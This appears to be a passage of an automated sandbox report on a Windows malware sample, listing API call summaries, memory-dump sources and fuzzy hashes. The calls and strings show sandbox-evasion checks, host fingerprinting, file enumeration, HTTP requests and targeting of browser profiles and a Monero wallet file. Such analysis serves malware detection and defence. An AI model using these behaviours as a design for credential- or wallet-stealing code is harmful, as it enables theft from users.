                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E48F98,?,006F110C,?,00000000,?,006F1110,?,00000000,006F0AEF), ref: 006E6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006E6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 006E6AF9
                        • Sleep.KERNEL32(00001770), ref: 006E6B04
                        • CloseHandle.KERNEL32(?,00000000,?,00E48F98,?,006F110C,?,00000000,?,006F1110,?,00000000,006F0AEF), ref: 006E6B1A
                        • ExitProcess.KERNEL32 ref: 006E6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 0ddc82d55d151674c111cbd59c3715e79f132e7ff74e4717d64382aa3c40341d
                        • Instruction ID: c1f0884149725e845958f23a902dddac38bff1a0df55009cd0995ba3b84ddb90
                        • Opcode Fuzzy Hash: 0ddc82d55d151674c111cbd59c3715e79f132e7ff74e4717d64382aa3c40341d
                        • Instruction Fuzzy Hash: C5F08930E46349EFE740ABA1DD16BFD7735FB14781F108528F513A11C1DBB05941EA56

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 09d4f76c86cf7483047ba0053cd3ce70ca7b0114fa94e9e636f6b7c971649ece
                        • Instruction ID: 95e2f88ce8a667656303d91b7893444136394bc37342d7d3466ba4e01fd7247c
                        • Opcode Fuzzy Hash: 09d4f76c86cf7483047ba0053cd3ce70ca7b0114fa94e9e636f6b7c971649ece
                        • Instruction Fuzzy Hash: 63214FB1D01308ABDF14DFA5E845ADE7B75FB45320F108629F919A72C1EB706A05CF92

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D6280: InternetOpenA.WININET(006F0DFE,00000001,00000000,00000000,00000000), ref: 006D62E1
                          • Part of subcall function 006D6280: StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D6303
                          • Part of subcall function 006D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D6335
                          • Part of subcall function 006D6280: HttpOpenRequestA.WININET(00000000,GET,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D6385
                          • Part of subcall function 006D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006D63BF
                          • Part of subcall function 006D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D63D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E5228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: ac4a1aede1f3a2fe6592e75ecdac2862b6ce05673e8ca8f773544731b0a643c5
                        • Instruction ID: 972ba1513e05a50cb697e1740f68f1825be4727825d6aaae1ba0b5c9edbb781e
                        • Opcode Fuzzy Hash: ac4a1aede1f3a2fe6592e75ecdac2862b6ce05673e8ca8f773544731b0a643c5
                        • Instruction Fuzzy Hash: 93113370912288ABDB54FFA5DD92AED733BAF50340F41416CF90A4A192EF34BB06C695
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 006E792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: ee40c70c313b6df1c99a3c03e22cca1f4beb4f50d3500e16d6b1e271be186ba5
                        • Instruction ID: d06e591ecd4f36e49b65314c2c09da286cc798b7f9077de09a1bd0d6e3c88107
                        • Opcode Fuzzy Hash: ee40c70c313b6df1c99a3c03e22cca1f4beb4f50d3500e16d6b1e271be186ba5
                        • Instruction Fuzzy Hash: 080181B1A19348EBC700DF99DD45BAEBBB8FB04B21F10429AFA55E3280D3745901CBA1
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 006D1132
                        • ExitProcess.KERNEL32 ref: 006D1143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: d33ba071c5eaab3f9de98333b91fc3c784eddfb8fda34e3039c23ef60aed05e1
                        • Instruction ID: 6d2adf3b327092410a5fef3c7ec96993d3c64c4e47470a4a7c57d33c4d0fff70
                        • Opcode Fuzzy Hash: d33ba071c5eaab3f9de98333b91fc3c784eddfb8fda34e3039c23ef60aed05e1
                        • Instruction Fuzzy Hash: 76E08670E5A308FBE7106BA09C0AB487678AB04B11F108085F7087A2C0C6F42A00E699
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006D10B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006D10F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 2857094dfb43cdfbe2a1ed6948efee8c4a431d27bdba3eda0a79a1b9ee5bf1c3
                        • Instruction ID: cd384a4918487024af797f065baef95f133b717c824a65a4346b54637adbf227
                        • Opcode Fuzzy Hash: 2857094dfb43cdfbe2a1ed6948efee8c4a431d27bdba3eda0a79a1b9ee5bf1c3
                        • Instruction Fuzzy Hash: 71F0E2B1A42308BBE714AAA8AC49FEAB7E8E705B15F304449F504E7380D9719F00DAA4
                        APIs
                          • Part of subcall function 006E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7910
                          • Part of subcall function 006E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006E7917
                          • Part of subcall function 006E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006E792F
                          • Part of subcall function 006E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006D11B7), ref: 006E7880
                          • Part of subcall function 006E7850: RtlAllocateHeap.NTDLL(00000000), ref: 006E7887
                          • Part of subcall function 006E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006E789F
                        • ExitProcess.KERNEL32 ref: 006D11C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 8b19427a109ce5bb78cd4d28e55469aaa274b8114427cd2374f5c6f8e6d0accb
                        • Instruction ID: 88323205bc1f9735009450a77c5ae988eedda20c744a64502efb32bbd1af17e6
                        • Opcode Fuzzy Hash: 8b19427a109ce5bb78cd4d28e55469aaa274b8114427cd2374f5c6f8e6d0accb
                        • Instruction Fuzzy Hash: DBE08CA1E2A30126CA4033B6BC0AB6E328E5B60345F040439BA0982202FA24EC00C56A
                        APIs
                        • wsprintfA.USER32 ref: 006E38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 006E38E3
                        • lstrcat.KERNEL32(?,?), ref: 006E3935
                        • StrCmpCA.SHLWAPI(?,006F0F70), ref: 006E3947
                        • StrCmpCA.SHLWAPI(?,006F0F74), ref: 006E395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006E3C67
                        • FindClose.KERNEL32(000000FF), ref: 006E3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 1d0def47f86f6fa33bcccde3e88c5bf92e5e864645db59610ab5fbbbc5a51753
                        • Instruction ID: bbc0924739053b5994497edc865896e2607eb0e7a0842d9eb5e73bdd661dc957
                        • Opcode Fuzzy Hash: 1d0def47f86f6fa33bcccde3e88c5bf92e5e864645db59610ab5fbbbc5a51753
                        • Instruction Fuzzy Hash: D1A153B1A11358ABDB64DFA5DC89FFA7379BF44300F048588A60D97241EB749B84CF62
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,006F0B32,006F0B2B,00000000,?,?,?,006F13F4,006F0B2A), ref: 006DBEF5
                        • StrCmpCA.SHLWAPI(?,006F13F8), ref: 006DBF4D
                        • StrCmpCA.SHLWAPI(?,006F13FC), ref: 006DBF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DC7BF
                        • FindClose.KERNEL32(000000FF), ref: 006DC7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 758aa09309855f0c86580b613ca30226315d71084eb7e452092736cd42ba38ef
                        • Instruction ID: f6a1da02e99e775b48de340b0c88284c9cadff69427243cbb701f3f085a39d8f
                        • Opcode Fuzzy Hash: 758aa09309855f0c86580b613ca30226315d71084eb7e452092736cd42ba38ef
                        • Instruction Fuzzy Hash: D342B572911248ABDB54FBB1DC96EEE733FAF84300F41455CB90696181EE30AF49CB96
                        APIs
                        • wsprintfA.USER32 ref: 006E492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 006E4943
                        • StrCmpCA.SHLWAPI(?,006F0FDC), ref: 006E4971
                        • StrCmpCA.SHLWAPI(?,006F0FE0), ref: 006E4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006E4B7D
                        • FindClose.KERNEL32(000000FF), ref: 006E4B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 94e834e493b46704566bd9137f13a79962654f436f4e93b3d8b2894daef966aa
                        • Instruction ID: b0126559fcdbc3a32292763518bfb83f133fe5b1650f10200b4b8edc6151a6b0
                        • Opcode Fuzzy Hash: 94e834e493b46704566bd9137f13a79962654f436f4e93b3d8b2894daef966aa
                        • Instruction Fuzzy Hash: E16152B2A11218ABDB20EBB1DC45EFA737DBB48701F04858CF60996141EF75AB85CF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006E4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E4587
                        • wsprintfA.USER32 ref: 006E45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 006E45BD
                        • StrCmpCA.SHLWAPI(?,006F0FC4), ref: 006E45EB
                        • StrCmpCA.SHLWAPI(?,006F0FC8), ref: 006E4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006E468B
                        • FindClose.KERNEL32(000000FF), ref: 006E46A0
                        • lstrcat.KERNEL32(?,00E4EA08), ref: 006E46C5
                        • lstrcat.KERNEL32(?,00E4DC80), ref: 006E46D8
                        • lstrlen.KERNEL32(?), ref: 006E46E5
                        • lstrlen.KERNEL32(?), ref: 006E46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: e49ff541de513f2a8e82c5d5c418ab34ca13ad2f0ce1dd59b2c8911b7aa6b5da
                        • Instruction ID: b0ad306dee0ea771d400e3233fbcc28a740c542bc39ca5f196e49d2999b37db2
                        • Opcode Fuzzy Hash: e49ff541de513f2a8e82c5d5c418ab34ca13ad2f0ce1dd59b2c8911b7aa6b5da
                        • Instruction Fuzzy Hash: B75166B5A15218ABCB60EBB0DC89FED737DAB58300F408588F60996191EF749F85CF91
                        APIs
                        • wsprintfA.USER32 ref: 006E3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 006E3EDA
                        • StrCmpCA.SHLWAPI(?,006F0FAC), ref: 006E3F08
                        • StrCmpCA.SHLWAPI(?,006F0FB0), ref: 006E3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006E406C
                        • FindClose.KERNEL32(000000FF), ref: 006E4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: e31902b5d583f93f1b40616fc4630ea960f0a961108f578cd0677d2a9f8374cc
                        • Instruction ID: a4fe366abf92f0a3f0f67eac4c3990f5d8d5e1e8763867de8583439df788e752
                        • Opcode Fuzzy Hash: e31902b5d583f93f1b40616fc4630ea960f0a961108f578cd0677d2a9f8374cc
                        • Instruction Fuzzy Hash: 565183B6915218ABCB24EBB0DC85EFA737DBB44300F00858CB61996141EB75AF86CF95
                        APIs
                        • wsprintfA.USER32 ref: 006DED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 006DED55
                        • StrCmpCA.SHLWAPI(?,006F1538), ref: 006DEDAB
                        • StrCmpCA.SHLWAPI(?,006F153C), ref: 006DEDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DF2AE
                        • FindClose.KERNEL32(000000FF), ref: 006DF2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: c2e4530ffe483836735b08ccdcc2acf7aab5177847a7a3cfc32b473723fc2453
                        • Instruction ID: ef123c5576e61a299119d6f6a8027003ecbdc9c6e09106cba316c04c24c12b64
                        • Opcode Fuzzy Hash: c2e4530ffe483836735b08ccdcc2acf7aab5177847a7a3cfc32b473723fc2453
                        • Instruction Fuzzy Hash: 5AE1267191325896EB94FBA1CC91EEF733AAF54300F41419DB50A66092EE307F8ACF55
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006F15B8,006F0D96), ref: 006DF71E
                        • StrCmpCA.SHLWAPI(?,006F15BC), ref: 006DF76F
                        • StrCmpCA.SHLWAPI(?,006F15C0), ref: 006DF785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DFAB1
                        • FindClose.KERNEL32(000000FF), ref: 006DFAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
